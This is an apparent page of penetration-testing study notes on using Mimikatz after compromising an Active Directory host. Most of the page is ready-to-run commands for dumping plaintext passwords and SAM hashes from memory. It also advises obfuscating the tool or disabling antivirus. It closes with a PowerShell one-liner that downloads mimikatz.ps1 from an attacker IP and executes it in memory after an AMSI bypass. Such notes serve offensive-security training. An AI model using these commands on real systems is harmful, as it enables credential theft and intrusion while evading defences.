// notes/ Active Directory
🏛️

Post Compromise Attacks Mimikatz

Mimikatz can be used to dump credentials in memory and make Kerberos tickets. Although it will get stopped by any and all Anti-Virus out there. Heavily obfuscating the executable …

#active directory#adot8
source · oscp.adot8.com · active-directory/post-compromise-attacks_mimikatz

Mimikatz

Overview

Mimikatz can be used to dump credentials in memory and make Kerberos tickets. Although it will get stopped by any and all Anti-Virus out there. Heavily obfuscating the executable or turning off AV is your best bet for using it

Running Mimikatz

Inside of an Administrator shell

powerquery
01mimikatz.exe
02privilege::debug - enables all other attacks
03sekurlsa::logonPasswords - can show plaintext passwords saved in credman
code
01.\mimikatz.exe "privilege::debug" "token::elevate" "sekurlsa::logonpasswords" "exit"
code
01.\mimikatz.exe "privilege::debug" "token::elevate" "lsadump::sam" "exit"

{% hint style="info" %} The credman passwords appear in clear text because when a network drive is mapped using the Connect using different credentials option, it is cached into credman as clear-text. {% endhint %}

Mimikatz.ps1

Run in memory after amsi bypass

code
01IEX(New-Object Net.WebClient).downloadString('http://10.9.254.6/mimikatz.ps1')